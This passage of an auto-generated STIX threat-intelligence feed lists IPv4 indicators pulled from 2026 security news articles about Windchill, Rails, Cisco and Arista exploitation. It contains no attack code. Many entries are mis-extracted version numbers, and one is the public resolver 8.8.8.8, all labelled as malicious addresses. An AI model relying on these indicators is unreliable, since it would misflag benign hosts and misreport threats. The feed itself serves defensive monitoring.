News","url":"https://thehackernews.com/2026/07/cl0p-affiliates-target-internet-exposed.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1671d50a-e7d0-4572-8ac5-39363a0aca5b","created":"2026-08-03T16:06:16.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 216.152.151.204","description":"Seen in \"Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE\" (The Hacker News). Context: s), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to or","pattern":"[ipv4-addr:value = '216.152.151.204']","pattern_type":"stix","valid_from":"2026-08-03T16:06:16.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cl0p-affiliates-target-internet-exposed.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--877afd35-b230-4b8e-8247-1b789fa08b02","created":"2026-08-03T16:06:16.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.180.41.35","description":"Seen in \"Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE\" (The Hacker News). Context: hared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from previously co","pattern":"[ipv4-addr:value = '5.180.41.35']","pattern_type":"stix","valid_from":"2026-08-03T16:06:16.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cl0p-affiliates-target-internet-exposed.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9de220a3-13d0-4f5e-922e-fe366f02d1c7","created":"2026-07-31T11:17:42.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 6.1.7.10","description":"Seen in \"Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads\" (The Hacker News). Context: h 8.0.5, and Rails 8.1.0 through 8.1.3. Rails 6.0.0 through 6.1.7.10 releases are affected only when Active Storage is configure","pattern":"[ipv4-addr:value = '6.1.7.10']","pattern_type":"stix","valid_from":"2026-07-31T11:17:42.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/critical-rails-flaw-could-let.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--695fb3e2-674f-4566-8a6f-7e1651fdbe7d","created":"2026-07-31T11:17:42.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.2.3.1","description":"Seen in \"Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads\" (The Hacker News). Context: tt Security list the affected ranges as Rails 7.0.0 through 7.2.3.1, Rails 8.0.0 through 8.0.5, and Rails 8.1.0 through 8.1.3.","pattern":"[ipv4-addr:value = '7.2.3.1']","pattern_type":"stix","valid_from":"2026-07-31T11:17:42.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/critical-rails-flaw-could-let.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2da7ad20-be35-4cfb-8a33-d8b14abcf6ef","created":"2026-07-31T11:17:42.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.2.3.2","description":"Seen in \"Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads\" (The Hacker News). Context: no backport, so affected applications must upgrade to Rails 7.2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5.","pattern":"[ipv4-addr:value = '7.2.3.2']","pattern_type":"stix","valid_from":"2026-07-31T11:17:42.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/critical-rails-flaw-could-let.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--58b674e9-1ea5-4c16-b716-9f78dc515fe0","created":"2026-07-31T11:17:42.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.0.5.1","description":"Seen in \"Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads\" (The Hacker News). Context: .2.3.2 or later. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the applica","pattern":"[ipv4-addr:value = '8.0.5.1']","pattern_type":"stix","valid_from":"2026-07-31T11:17:42.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/critical-rails-flaw-could-let.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4cd51db-1ddb-4973-a4a9-fa05342e9159","created":"2026-07-31T11:17:42.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.1.3.1","description":"Seen in \"Critical Rails Flaw Could Let Unauthenticated Attackers Read Server Files via Image Uploads\" (The Hacker News). Context: ter. Operators should upgrade to Rails 7.2.3.2, 8.0.5.1, or 8.1.3.1 and rotate every secret readable by the application process","pattern":"[ipv4-addr:value = '8.1.3.1']","pattern_type":"stix","valid_from":"2026-07-31T11:17:42.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/critical-rails-flaw-could-let.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--689a592c-4538-4c4c-8c67-b67cc325feac","created":"2026-07-30T10:33:15.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.1.4.4","description":"Seen in \"Hackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts\" (The Hacker News). Context: Internet & Security Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as t","pattern":"[ipv4-addr:value = '1.1.4.4']","pattern_type":"stix","valid_from":"2026-07-30T10:33:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/hackers-exploit-anysign4pc-via-hacked.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--53a5ebc7-a5fd-46be-8c44-0a91dbe6b6ce","created":"2026-07-30T10:33:15.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.1.4.6","description":"Seen in \"Hackers Exploit AnySign4PC via Hacked Korean Sites to Install Backdoors Without Prompts\" (The Hacker News). Context: rity Agency (KISA) says AnySign4PC versions 1.1.4.4 through 1.1.4.6 are affected and lists version 1.1.5.0 as the fixed release","pattern":"[ipv4-addr:value = '1.1.4.6']","pattern_type":"stix","valid_from":"2026-07-30T10:33:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/hackers-exploit-anysign4pc-via-hacked.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be9ebefd-cfc4-4e18-94fb-dbf8398b5106","created":"2026-07-30T09:06:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.0.9.1","description":"Seen in \"U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: ease Hot Fix Name 7.0 Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.","pattern":"[ipv4-addr:value = '7.0.9.1']","pattern_type":"stix","valid_from":"2026-07-30T09:06:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196289/security/u-s-cisa-adds-a-cisco-secure-firewall-management-center-fmc-flaw-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae51cb39-a18e-4e81-ae17-f7f12bb1bfac","created":"2026-07-30T09:06:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.2.11.1","description":"Seen in \"U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: .9.1-3.sh.REL.tar 7.2 Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.","pattern":"[ipv4-addr:value = '7.2.11.1']","pattern_type":"stix","valid_from":"2026-07-30T09:06:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196289/security/u-s-cisa-adds-a-cisco-secure-firewall-management-center-fmc-flaw-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--93904ba4-6585-4989-9e8a-76a6e1525fa0","created":"2026-07-30T09:06:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.4.7.1","description":"Seen in \"U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: 11.1-4.sh.REL.tar 7.4 Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.","pattern":"[ipv4-addr:value = '7.4.7.1']","pattern_type":"stix","valid_from":"2026-07-30T09:06:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196289/security/u-s-cisa-adds-a-cisco-secure-firewall-management-center-fmc-flaw-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d36e8a7-52db-4484-b4ce-f22a020f42fa","created":"2026-07-30T09:06:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.6.5.1","description":"Seen in \"U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: .7.1-3.sh.REL.tar 7.6 Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.","pattern":"[ipv4-addr:value = '7.6.5.1']","pattern_type":"stix","valid_from":"2026-07-30T09:06:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196289/security/u-s-cisa-adds-a-cisco-secure-firewall-management-center-fmc-flaw-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d53baaa8-7d45-437e-b628-a89e07703fb4","created":"2026-07-30T09:06:56.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.7.12.1","description":"Seen in \"U.S. CISA adds a Cisco Secure Firewall Management Center (FMC) flaw to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: .5.1-2.sh.REL.tar 7.7 Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10.0","pattern":"[ipv4-addr:value = '7.7.12.1']","pattern_type":"stix","valid_from":"2026-07-30T09:06:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196289/security/u-s-cisa-adds-a-cisco-secure-firewall-management-center-fmc-flaw-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a212060-3e9f-46c4-8ae3-a97e9d5d6594","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 206.72.242.124","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: iew the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 \"If compromise is suspected, operators shoul","pattern":"[ipv4-addr:value = '206.72.242.124']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12305f67-7fd0-4ab1-90b7-74ca81d9ac55","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 206.72.242.162","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 \"If compromise is suspected, operators should preserve VCO","pattern":"[ipv4-addr:value = '206.72.242.162']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2cf79e8-5d8f-41a1-8d82-920c37b9ce08","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.2.3.14","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: llowing versions are affected - VCO 5.2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prio","pattern":"[ipv4-addr:value = '5.2.3.14']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--164f7b8b-709e-4b5b-9452-c0e18a855a58","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 6.1.3.4","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: .2.x releases prior to 5.2.3.14 VCO 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prio","pattern":"[ipv4-addr:value = '6.1.3.4']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c98bcfe0-5e05-4f8f-b02d-c1b4fb0dded8","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 6.4.2.4","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: 6.1.x releases prior to 6.1.3.4 VCO 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged tha","pattern":"[ipv4-addr:value = '6.4.2.4']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c87fe409-1574-4db5-9f2f-7c557b2f5f0b","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.0.0.1","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: 6.4.x releases prior to 6.4.2.4 VCO 7.0.x releases prior to 7.0.0.1 Arista acknowledged that the vulnerability was externally d","pattern":"[ipv4-addr:value = '7.0.0.1']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26c8b230-f1fa-452f-8fda-ef7fd8be514d","created":"2026-07-28T04:43:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.19.75.217","description":"Seen in \"Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw\" (The Hacker News). Context: them and review the logs to determine if they are present - 8.19.75.217 206.72.242.124 206.72.242.162 \"If compromise is suspected,","pattern":"[ipv4-addr:value = '8.19.75.217']","pattern_type":"stix","valid_from":"2026-07-28T04:43:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/attackers-exploit-arista-velocloud.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3bbec699-2cbc-402d-b88a-d57d79a92c63","created":"2026-07-27T17:53:12.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 51.89.204.28","description":"Seen in \"MedusaHVNC Trojan Creates Hidden Desktops to Hijack Browsers and Steal Data\" (Security Affairs). Context: ative networking functions, and the command server address, 51.89.204.28 on port 4444, is baked directly into the binary rather than","pattern":"[ipv4-addr:value = '51.89.204.28']","pattern_type":"stix","valid_from":"2026-07-27T17:53:12.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196111/malware/medusahvnc-trojan-creates-hidden-desktops-to-hijack-browsers-and-steal-data.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--883c1226-1f62-4302-b66f-5bfd44c6258d","created":"2026-07-26T13:04:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.8.8.8","description":"Seen in \"Hackers Hijack Hotel Wi\" (Security Affairs). Context: people already have. Switching to a hardcoded resolver like 8.8.8.8 doesn’t save you, because the query still leaves the laptop","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-07-26T13:04:29.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196017/security/hackers-hijack-hotel-wi-fi-to-steal-microsoft-365-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c05235d7-47fc-4c17-bd01-63d943c8fd20","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.194.9.14","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: .54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 21","pattern":"[ipv4-addr:value = '104.194.9.14']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0b098b07-0b07-4a11-9ca2-aedd04f72566","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.243.35.131","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.2","pattern":"[ipv4-addr:value = '104.243.35.131']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf23a6fd-3611-4d27-a5b8-5fa87e707d52","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.243.35.63","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control address) Web shel","pattern":"[ipv4-addr:value = '104.243.35.63']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a60f5b97-c6d6-478a-9822-d8a13eb20553","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 172.111.38.31","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: icators of compromise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.","pattern":"[ipv4-addr:value = '172.111.38.31']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3307abaf-e2ff-41bd-be29-a7db7901b9b4","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.227.83.236","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: .146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5","pattern":"[ipv4-addr:value = '185.227.83.236']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d388a19-8252-4e0d-8534-4dae28dc2ed7","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 209.222.98.44","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: 5.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204","pattern":"[ipv4-addr:value = '209.222.98.44']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef466d57-8307-4fd4-9a09-2eff122f14a5","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 216.152.148.54","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: promise (IoCs) associated with the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104","pattern":"[ipv4-addr:value = '216.152.148.54']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--17e499ce-2ddd-444a-9f1d-1125ea88074b","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 216.152.151.204","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: 14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command-and-control add","pattern":"[ipv4-addr:value = '216.152.151.204']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4608721-3a66-4000-bba9-16b709d2fba9","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 38.60.157.212","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: /24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (Attacker command","pattern":"[ipv4-addr:value = '38.60.157.212']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36629e4c-552b-42cc-a826-6faabd3aae25","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.180.41.35","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 7","pattern":"[ipv4-addr:value = '5.180.41.35']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc356c40-9f96-482e-8a4c-9d1b7c63efb8","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 74.50.76.146","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to KEV as Web Shell Attacks Continue\" (The Hacker News). Context: the activity - 172.111.38.31 216.152.148.54 104.243.35.131 74.50.76.146 5.180.41.35 104.243.35.0/24 104.194.9.14 209.222.98.44 185.","pattern":"[ipv4-addr:value = '74.50.76.146']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3832ee2c-3bf4-46ba-8049-09fadafa9363","created":"2026-07-25T09:59:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 78.128.113.10","description":"Seen in \"CISA Adds Exploited PTC Windchill RCE Flaw to 